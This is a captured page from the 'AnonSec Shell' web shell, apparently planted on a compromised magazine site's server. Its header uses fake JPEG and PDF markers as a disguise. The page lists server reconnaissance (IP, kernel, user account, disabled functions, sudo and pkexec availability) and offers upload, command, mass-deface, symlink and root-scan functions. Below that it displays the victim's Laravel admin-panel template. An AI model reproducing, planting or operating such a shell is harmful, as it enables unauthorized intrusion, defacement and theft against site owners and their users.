ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/storage/framework/views/faa1c176815f6c8e3f84dfbaf93aad59
<!DOCTYPE html>

<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Evidência Revista - Painel Administrativo | Login</title>

	<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">

	<link rel="stylesheet" href="<?php echo e(asset('css/app.css')); ?>">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
	<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">


	<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
	<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
	<![endif]-->
</head>

<body class="hold-transition skin-red sidebar-mini">

	<div class="load-page"></div>

	<div class="msg-all col-lg-6 text-center">
		<?php if($errors->any()): ?>
		<div class="alert alert-danger alert-dismissible fade in" role="alert">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
				aria-hidden="true">×</span>
			</button>
			<?php foreach($errors->all() as $error): ?>
			<div><i class="glyphicon glyphicon-alert"></i> <?php echo e($error); ?></div>
			<?php endforeach; ?>
		</div>
		<?php endif; ?>

		<?php if(Session::has('ok')): ?>
		<div class="alert alert-success msg-all col-lg-6">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close">
				<span aria-hidden="true">×</span>
			</button>
			<i class="glyphicon glyphicon-ok"></i> <?php echo e(Session::get('ok')); ?></div>
			<?php endif; ?>
		</div>


		<?php if(Session::has('task')): ?>
		<div class="alert alert-success msg-all-static col-lg-8">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close">
				<span aria-hidden="true">×</span>
			</button>
			<i class="glyphicon glyphicon-ok"></i> <?php echo e(Session::get('task')); ?></div>
			<?php endif; ?>


			<div class="wrapper">

				<!-- Main Header -->
				<header class="main-header">

					<!-- Logo -->
					<a href="<?php echo e(route('home.index')); ?>" class="logo">
						<!-- mini logo for sidebar mini 50x50 pixels -->
						<span class="logo-mini">EV</span>
						<!-- logo for regular state and mobile devices -->
						<span class="logo-lg">Evidência Revista</span>
					</a>

					<!-- Header Navbar -->
					<nav class="navbar navbar-static-top" role="navigation">
						<!-- Sidebar toggle button-->
						<a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
							<span class="sr-only">Toggle navigation</span>
						</a>
						<!-- Navbar Right Menu -->
						<div class="navbar-custom-menu">
							<ul class="nav navbar-nav">


								<li>
									<a href="#" style="font-weight: bold; font-size: 0.9em; color: #fff">
										<?php setlocale(LC_ALL, 'pt_BR', 'ptb'); ?>
										<?php echo e(\Carbon\Carbon::now()->formatLocalized('%A, %d de %B de %Y')); ?>

									</a>
								</li>


								<!-- User Account Menu -->
								<li class="dropdown user user-menu">
									<!-- Menu Toggle Button -->
									<a href="#" class="dropdown-toggle" data-toggle="dropdown">
										<!-- The user image in the navbar-->
										<?php if(Auth::user()->file == null): ?>
										<img src="<?php echo e(asset('images/avatar.png')); ?>"
										class="user-image" alt="User Image">
										<?php else: ?>
										<img src="<?php echo e(asset('uploads/users/avatar/'.Auth::user()->file)); ?>"
										class="user-image" alt="User Image">
										<?php endif; ?>

										<!-- hidden-xs hides the username on small devices so only the image appears. -->
										<span class="hidden-xs"><?php echo e(Auth::user()->name); ?></span>
									</a>
									<ul class="dropdown-menu">
										<!-- The user image in the menu -->
										<li class="user-header">
											<?php if(Auth::user()->file == null): ?>
											<img src="<?php echo e(asset('images/avatar.png')); ?>"
											class="img-circle" alt="User Image">
											<?php else: ?>
											<img src="<?php echo e(asset('uploads/users/avatar/'.Auth::user()->file)); ?>"
											class="img-circle" alt="User Image">
											<?php endif; ?>
											<p><?php echo e(Auth::user()->name); ?> - <?php echo e(Auth::user()->function); ?></p>
										</li>

										<li class="user-footer">

											<a href="<?php echo e(route('avatar.edit')); ?>" class="btn btn-default btn-flat margin-top">
												<i class="glyphicon glyphicon-camera"></i> Avatar</a>

												<a href="<?php echo e(route('profile.edit')); ?>" class="btn btn-default btn-flat margin-top">
													<i class="glyphicon glyphicon-user"></i> Perfil</a>

													<a href="<?php echo e(route('login.logout')); ?>" class="btn btn-default btn-flat margin-top">
														<i class="glyphicon glyphicon-off"></i> Sair</a>
													</li>
												</ul>
											</li>
											<!-- Control Sidebar Toggle Button -->

											<?php /*<li>
											<a href="#" data-toggle="control-sidebar"><i class="fa fa-gears"></i></a>
										</li>*/ ?>

									</ul>
								</div>
							</nav>
						</header>
						<!-- Left side column. contains the logo and sidebar -->
						<aside class="main-sidebar">

							<!-- sidebar: style can be found in sidebar.less -->
							<section class="sidebar">

								<!-- Sidebar user panel (optional) -->
								<div class="user-panel">
									<div class="pull-left image">
										<?php if(Auth::user()->file == null): ?>
										<img src="<?php echo e(asset('images/avatar.png')); ?>"
										class="img-circle" alt="User Image">
										<?php else: ?>
										<img src="<?php echo e(asset('uploads/users/avatar/'.Auth::user()->file)); ?>"
										class="img-circle" alt="User Image">
										<?php endif; ?>

									</div>
									<div class="pull-left info">
										<p><?php echo e(Auth::user()->name); ?></p>
										<!-- Status -->
										<a href="#"><i class="fa fa-circle text-success"></i> Online</a>
									</div>
								</div>

								<!-- search form (Optional) -->
								<form action="#" method="get" class="sidebar-form">
									<div class="input-group">
										<input type="text" name="q" class="form-control" placeholder="Buscar...">
										<span class="input-group-btn">
											<button type="submit" name="search" id="search-btn" class="btn btn-flat"><i
												class="fa fa-search"></i>
											</button>
										</span>
									</div>
								</form>
								<!-- /.search form -->


								<!-- Sidebar Menu -->
								<ul class="sidebar-menu">


									<li class="header"><i class="glyphicon glyphicon-cog"></i> GERENCIAR CONTEÚDO</li>

									<li>
										<a href="<?php echo e(route('post.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Meu Blog</span>
										</a>
									</li>


									<?php if(Auth::user()->nivel == 1): ?>
									<li class="header"><i class="glyphicon glyphicon-cog"></i> PAINEL ADMINISTRATIVO</li>
									<li>
										<a href="<?php echo e(route('category.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Categorias</span>
										</a>
									</li>

									<li>
										<a href="<?php echo e(route('slide.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Slides</span>
										</a>
									</li>

									<li>
										<a href="<?php echo e(route('parceiro.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Parceiros</span>
										</a>
									</li>


									<li>
										<a href="<?php echo e(route('revista.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Revistas</span>
										</a>
									</li>
									

									<li>
										<a href="<?php echo e(route('sobre.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Sobre</span>
										</a>
									</li>

									<li>
										<a href="<?php echo e(route('post.admin.index')); ?>"><i class="fa fa-circle-o text-white"></i>
											<span>Gerenciar posts</span>
										</a>
									</li>

									<li>
										<a href="<?php echo e(route('users.index')); ?>"><i class="glyphicon glyphicon-user text-white"></i>
											<span>Usuários</span>
										</a>
									</li>
									<?php endif; ?>


								</ul>
								<!-- /.sidebar-menu -->


							</section>
							<!-- /.sidebar -->
						</aside>


						<!-- CONTENT -->
						<div class="content-wrapper bg-silver">
							<?php echo $__env->yieldContent('content'); ?>
						</div>
						<!-- /.CONTENT -->


						<!-- Main Footer -->
						<footer class="main-footer">
							<!-- To the right -->
							<div class="pull-right hidden-xs">
								agenciaboomerang.com.br
							</div>
							<!-- Default to the left -->
							<strong> &copy; 2016 <a href="#">Agência Boomerang</a></strong>
						</footer>


						<div class="control-sidebar-bg"></div>
					</div>
					<!-- ./wrapper -->

					<script src="<?php echo e(asset('js/app.js')); ?>"></script>
					<script src="<?php echo e(asset('tinymce/tinymce.min.js')); ?>"></script>
					<script src="<?php echo e(asset('tinymce/tinymce.init.js')); ?>"></script>
					<script>
						$(document).ready(function () {
							$('.del').click(function () {
								$('.load-page').fadeIn('fast');
							});
						});
					</script>

				</body>
				</html>

Anon7 - 2022
AnonSec Team